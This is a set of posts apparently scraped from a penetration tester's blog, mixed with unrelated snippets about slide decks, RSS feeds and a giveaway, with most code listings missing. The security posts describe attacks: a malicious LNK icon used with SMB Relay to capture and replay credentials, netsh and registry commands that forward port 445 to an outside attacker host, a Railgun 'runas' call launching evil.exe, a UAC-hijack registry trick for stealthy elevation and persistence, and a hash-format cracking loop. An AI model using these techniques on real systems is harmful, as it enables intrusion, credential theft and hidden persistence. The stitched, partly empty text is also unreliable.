Since this is a constantly updating slide deck I figured I’d post it here so I didn’t have to keep emailing it out. ;–) If you have comments or if something is wrong grammatically, technically or in any other way I’d love input. Suggestions also welcome.
Here is a link straight to the doc if you want to comment or add it to your google docs list: https://docs.google.com/presentation/d/1pPXLg3KqwSMLRCNRfows5QnVI2mLjSmll5vN2WHMFJg/edit
This was an honest idea to help identify people that might not get the media attention of other “Top X in Infosec” lists. But I should have known better than to put a poll on the internet…
I have been using the LNK trick I talked about in my last post for a while, but always needing a Windows machine to create the LNK file. When I decided to write a post about it, I wanted to put the stipulation for myself that I would finally develop a way to get it done with out having to lug around a VM or spin one up every time I needed to change it’s target.
Of course the first place I looked was Meterpreter’s Railgun (direct windows API calling within meterpreter). But to do it with Railgun I would have to develop a way to work with COM objects. Something that I don’t believe is built into Railgun (yet… /me nudges chao-mu). The second place I looked was to see if I could just build an LNK file from scratch using the spec.aspx).. ya…. that didn’t go so..*zzzZZZzzzzzzzZzzz
Enter mona, the Corelan Team’s exploit development plugin for Immunity Debugger. Now, usually it is used exactly as intended, as an exploit development tool, and I guess you could consider my use of it as an extension of that as well. But, anyways, one of Mona’s many and probably one of the least well known functions is ‘header’. What this function does is simply output a ruby version of the file broken into ASCII and binary parts. That’ll make much more sense in a sec, back to the problem. I need to recreate a file in a way I can manipulate it on the fly with enough agility to be useful to others in a post module without using the spec or Railgun to assist.
We start off with the maliciously altered LNK file, and an up to date version of Immunity and mona:
I copied the shortcut file to the C drive so I didn’t have to specify a huge path in the mona command, and issued:
“!mona header C:\autoexec.lnk”
As you can see, mona breaks up the binary into ‘understandable’ portions, so if it sees a string is keeps it together, if it sees unicode, it actually uses the Rex ruby libraries. You can try it yourself and scroll through the results but when I saw:
1
| |
I knew I was golden. Quick note: pay close attention when you edit the output of this command in a text editor, initially I didn’t notice the ‘tick’ ( ` ) at the end of the share string and it cause me a lot of grief.
Cool, so I have a bit of ruby that puts the contents of my LNK file into a ruby variable. Now what?
Now I have 3 challenges:
Changing the line I found for the share name into this:
1
| |
‘datastore’ is used as the container for variable set by default or by the user using the module. Adding those option for the user is pretty easy. You just add the following to the ‘register_options’ section of your module:
1 2 3 | |
OptAddressRange is used instead of a string because it has a bit of validation that you are actually using something that either resembles an IP address or a hostname.
Problem 1 solved. Problem 2 was just as easy, the following line:
1
| |
creates a new file on the victim, and ‘file.write(lnk)’ writes the binary contents of the ‘lnk’ variable into it.
Problem 3 is much more tricky, but here is the path to wisdom:
1
| |
Hope this helps spur people into trying their hand at developing some modules of their own.
TL;DR: SMB Relay + LNK UNC icons = internal pentest pwnage
I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own.
MS08_068: http://www.cvedetails.com/cve/CVE-2008-4037/
In 2008, Microsoft released MS08_068 which patched the “SMB Relay” attack. To boil this down, an attacker gets a victim to attempt to authenticate to an attacker controlled box. The attack delays its responses to the victim and replays the important parts of the authentication that the victim sent back at the victim. You can find out a lot more about this vulnerability here: https://community.rapid7.com/community/solutions/metasploit/blog/2008/11/11/ms08-068-metasploit-and-smb-relay
One thing to take away from that post is that the patch stops Attacker <=> Victim, but does not / cannot fix Victim <=> Attacker <=> Victim2 (use authentication from Victim to replay to Victim2)
MS10_046: http://www.cvedetails.com/cve/CVE-2010-2568/
In 2010, Microsoft released MS10_046 which patched the Stuxnet LNK vulnerability where a malicious DLL could be loaded (locally or remotely over WebDAV) using the path of the shortcut’s icon reference. LNK files are Windows shortcut files that allow the icons of the files to be changed much more dynamically than any other file type (Right click a shortcut, go to Properties, and just simply click the ‘Change Icon’ button). I could certainly be wrong here, but I believe all Microsoft patched was the ability to use this feature to load the DLLs via a certain Control Panel object. Which leaves the ability to load shortcut (LNK) icons from wherever we wish. ;–)
The Setup:
If you are on an internal penetration test and either exploit a machine or find an open share, you can create an LNK file with an icon that points at a nonexistent share on your attacking machine’s IP and use SMB_Relay to replay those credentials to a system in which we’ve identified by one means or another as an ‘important’ host to get on.
Attacker uploads malicious LNK file to network share on FILE SHARE
Victim views it on WORKSTATION that initiates an connection to ATTACKER
Attacker relays those authentication attempts to FILE SHARE, gaining code execution if ‘Victim’ is an admin on FILE SHARE
If not, then NetNTLM are still visible in the logs and can be attempted to crack, or just wait for more people to view the LNK file on the public share, and hope that an admin comes by at some point.
Your mileage will vary based on where you put the LNK file.
The Video:
I have created a post module to automate the process of creating and uploading the LNK file (so you don’t have to have a Windows box lying around). Here it is in action:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | |
You can find the code here:
https://github.com/mubix/Not-In-Pentesting-Class/blob/master/modules/post/mubix/droplnk.rb
Going forward:
Obviously this isn’t so effective remotely out of the box and there currently isn’t a SMB_Relay for WebDAV (although I’m guessing that would work). However I was able to construct a crude way getting smb_relaying working using some pretty loud system changes to an exploited host:
reg add HKLM\System\CurrentControlSet\Services\NetBTParameters /v SMBDeviceEnabled /t REG_DWORD /d 0netsh int portproxy v4tov4 listenport=445 connectaddress=the.bad.guy.com connectport=80These steps can get you noticed in almost every way, so it’s not recommended, I just did it as a PoC. I mean how cool is it to remotely exploit SMB vulns ;–)
The other thing is, administrators are becoming much more rare as years move along and people use lower priv users for their daily tasks, so there are currently feature requests in to the Metasploit project to make it so when you get SMB_Relay correctly forwarding good credentials, even if they aren’t admin and you cannot get code execution it would be nice to be able to go through the files that person has access to on the targeted system / file share. A final pipe dream of this post is to have a multi-threaded smb_relay that 2, 3 or even 10 servers can be targeted with the relayed authentication.
just saying’…. /me nudges the Metasploit devs…
This is my talk that I gave at ShmooCon 2012. It was a great honor to be given the chance to speak at ShmooCon as it has been my second home since 2006 (missed the first one… havent missed one since)
A number of times during tests I’ve actually run into those mythical creatures called “patched windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute windows function via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:
client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)
This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.exe’ with Administrative privs. If they are not “Admins” themselves then it would prompt them for the user name and password (normally the case in systems attached to domains). Something to be aware of: If your evil.exe is not code-signed the UAC box will be orange instead of blue. You can get around this a bit by using rundll32.exe (which is signed ;–) ) as is svchost.exe. (You may also want to not name it evil.exe)
The downfall here is that 1. You have to drop a binary (boooo) 2. You are prompting the user for UAC control when they didn’t do anything to cause it. Users are generally as smart as bait, but it’s good practice to assume to the contrary. If for nothing else other than to challenge yourself to up your game.
Number 1 I’ll leave to another post, so lets solve #2.
When a “runas” ShellExecute (which UAC runs natively #hint#hint) a few registry locations are checked. One I’d like to point out is the HKLM\Software\Classes\exefile key. The ‘exefile’ as should be obvious is the registry settings for executables, and as such tells Windows how to interact with them. In HKLM (which is only writable by Administrators) the “shell\open”, “shell\runas” and “shell\runasuser” subkeys exist (the structure looks oddly familiar to anyone who visited the ShellExecute page more than once). Inside “shellopencommand” the default string has “%1” % – this basically means execute the binary %1 and hand the arguments given directly to it %. Awesome! From here you can alter how every EXE runs on the system (don’t do it, Windows doesn’t like you afterwards, trust me, and remember to snapshot if you don’t).
Great, but how does this help us, we aren’t admins. HKCU is writable by the ‘Current User’ hence the name, and it so happens to have a very similar registry path: HKCU\Software\Classes. Depending on your system, it may or may not have a “exefile” subkey. If it doesn’t it’s pretty easy to create. Lets make it match the “runas” one in HKLM
The tree should look something like this when you are done:
Under command change the default value to “%1” %* just as it is in HKLM, and add a new String value called ‘IsolatedCommand’ with the same value as default. With these settings, very little has changed on the system or its operation. However, if we change the ‘IsolatedCommand’ String to ‘notepad.exe’ and attempt to ‘Run As Administrator’ on that system using any binary guess what happens? Notepad! (as Admin). w00t. Now we can swap in our evil.exe and bob wins right? Sorta. We still have that horrible problem of stealth. Whatever the user was trying to UAC up won’t work, and they’ll try it again, and start investigating the problem, which we don’t want them to do.
Enter ‘runyou.exe’, it’s some very simple C++ that weighs in at a whopping 8k when compiled (probably could loose some weight by those who know better compiler options):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | |
This code executes the first program visibly and then the second hidden. You probably see where this is going, but we change our IsolatedCommand String to runyou.exe %1 evil.exe and now we give them exactly what they want in an elevated state, but also get our evil binary there too ;–)
The very real down side to this is you have to wait for the user to use UAC (this does not work if someone else does, it’s only for the current user HKCU). But, as a side benefit, it’s a very real form of sneaky persistence as well, as it will execute our evil binary every single time they use UAC.
Game Over… ;–)
Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early:
1 2 3 4 5 6 7 8 9 10 11 12 13 | |
It’s pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).
(Think KeePass, 1Password, LastPass…)
When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked. I’ve found Tumblr to be not a very good substitue for Google Reader’s functionality (IMHO).
The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;–) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.
I know what you’re thinking, cool, but no big deal right? It goes to twitter, and not to a feed that someone can subscribe to. You’re right, and I fought all day trying to figure that part out and finally came up with a twitter search for my tweets and a special hashtag I would use for my shared links. I found the RSS feed for that search and it looks like this:
http://search.twitter.com/search.atom?q=from%3Amubix%20%23SharedLinks
obviously, this isn’t the easiest or pretty link to send around, so instead I pumped that into Feedburner and now have this for a feed link:
http://feeds.feedburner.com/MubixLinks
Much easier to share, with one AMAZING added bonus. I can switch the feed that powers it at any time, so from now on, no matter if I use Tumblr or Google Reader (after they unjack themselves) or G+ (if they finally set up a feed for +1’d items), that will always be the link to items that I’ve personally liked and wanted to share.
I encourage you to do the same, and leave a comment, so that I can follow your feed back!
Oh, and sign up for Buffer here (w/ my referal link ;) http://bufferapp.com/r/7e450
Pentest Monkey is a great resource for a lot of things. One of which is this:
John The Ripper Hash Formats | pentestmonkey
I used it, plus a bit of bash fu to try to figure out some hashes that I was trying to crack.
Step 1: Create file of supported hash types. For me, that was simple I just threw the following in ‘supported_types.txt’ in the same directory as john.
DES
BSDI
MD5
BF
AFS
LM
NT
XSHA
PO
raw-MD5
MD5-gen
IPB2
raw-sha1
md5a
hmac-md5
phpass-md5
KRB5
bfegg
nsldap
ssha
openssha
oracle
oracle11
MYSQL
mysql-sha1
mscash
lotus5
DOMINOSEC
NETLM
NETNTLM
NETLMv2
NETNTLMv2
NETHALFLM
mssql
mssql05
epi
phps
mysql-fast
pix-md5
sapG
sapB
md5ns
HDAA
Then it’s as simple as issuing:
cat supported_types.txt | xargs -t -I type ./john --pot=unknownhash.pot --wordlist=shortlist.txt --format=type hashfile.txt
That will essentially try each of the types on the hash file. It’s important to use a wordlist, and probably a small one initially because if you don’t john will not finish once it gets to the first hash type that it accepts, which may not actually be correct.
You can take this a step further and create a hash mangler script that takes a clean hash and adds the few prefixs and suffixs that are common on Pentest Monkey’s list to get the most odds at John picking it up.
Our first day of No Starch winner is Russ with Room 362 right next to the Fire Hose ;–)
1st Day of @NoStarch Winner